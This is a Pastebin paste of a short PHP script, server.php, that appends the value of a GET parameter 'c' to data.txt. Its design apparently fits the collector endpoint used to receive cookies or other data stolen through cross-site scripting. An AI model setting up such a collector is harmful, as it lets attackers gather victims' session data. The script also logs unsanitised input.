Advertisement
Guest User

Untitled

a guest
Apr 28th, 2018
136
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.15 KB | None | 0 0
  1. <?php
  2. // server.php
  3.  
  4. if(!empty($_GET['c'])) {
  5. $logfile = fopen('data.txt', 'a+');
  6. fwrite($logfile, $_GET['c']);
  7. fclose($logfile);
  8. }
  9. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement